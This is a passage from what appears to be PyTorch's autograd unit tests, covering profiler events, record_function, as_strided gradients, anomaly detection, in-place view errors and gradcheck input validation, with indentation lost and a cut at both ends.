s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and fail numerical Jacobian check consequently
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
